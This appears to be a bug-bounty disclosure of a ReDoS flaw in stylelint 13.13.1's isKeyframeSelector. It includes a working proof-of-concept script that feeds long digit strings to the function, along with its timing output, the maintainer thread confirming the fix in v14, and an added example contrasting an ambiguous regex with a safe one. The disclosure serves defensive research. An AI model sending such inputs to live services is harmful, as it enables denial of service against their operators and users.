Inefficient Regular Expression Complexity in stylelint/stylelint


Reported on

Oct 16th 2021


I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling the function isKeyframeSelector.

Proof of Concept

// PoC.js
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")

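for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '1'.repeat(i*10000)+"a";
    // time a single call on a long run of digits followed by a non-matching character
    isKeyframeSelector(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}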

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
Yeting Li
2 years ago


@admin, please see the security policy

We have contacted a member of the stylelint team and are waiting to hear back 2 years ago
stylelint/stylelint maintainer
2 years ago


Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li
2 years ago


Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

stylelint/stylelint maintainer
2 years ago


Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li
2 years ago


Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

stylelint/stylelint maintainer validated this vulnerability 2 years ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
stylelint/stylelint maintainer marked this as fixed with commit 060310 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
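
The timings in the report's output grow roughly quadratically with input length. The following added example (not part of the original report and not stylelint's code) shows how a percentage pattern with overlapping digit quantifiers produces that growth on the PoC's input shape, next to an unambiguous rewrite with a length cap. Both regexes, the function names and the cap value are assumptions made for illustration.

```javascript
// Added example: both patterns are constructed for illustration and are not
// copied from stylelint's source.

// Ambiguous: \d+ and \d* can both claim the same digits (the "." between them
// is optional), so a failing input like "111...1a" makes the engine retry
// every way of splitting the digit run: quadratic work.
const AMBIGUOUS = /^(?:\d+\.?\d*|\d*\.?\d+)%$/;

// Unambiguous: a second digit run is only reachable through a literal ".",
// so each digit can be consumed one way only: linear work, same language.
const UNAMBIGUOUS = /^(?:\d+(?:\.\d*)?|\.\d+)%$/;

// Hypothetical cap: a real percentage selector is a handful of characters.
const MAX_SELECTOR_LENGTH = 64;

function isPercentageSelector(selector) {
  if (typeof selector !== "string" || selector.length > MAX_SELECTOR_LENGTH) {
    return false;
  }
  return UNAMBIGUOUS.test(selector);
}

// Time one failing match on the PoC's input shape: n digits followed by "a".
function timeMatch(re, n) {
  const input = "1".repeat(n) + "a";
  const start = performance.now();
  const matched = re.test(input);
  return { length: input.length, matched, ms: performance.now() - start };
}

// Doubling the input should roughly double the time for a linear pattern
// and roughly quadruple it for a quadratic one.
function growthTable(sizes) {
  return sizes.map((n) => ({
    length: n + 1,
    ambiguousMs: timeMatch(AMBIGUOUS, n).ms,
    unambiguousMs: timeMatch(UNAMBIGUOUS, n).ms,
  }));
}

for (const row of growthTable([2000, 4000, 8000])) {
  console.log(
    `length ${row.length}: ambiguous ${row.ambiguousMs.toFixed(1)} ms, ` +
      `unambiguous ${row.unambiguousMs.toFixed(1)} ms`
  );
}
```

The same doubling measurement can be pointed at any validator regex in a regression test to catch super-linear growth before release.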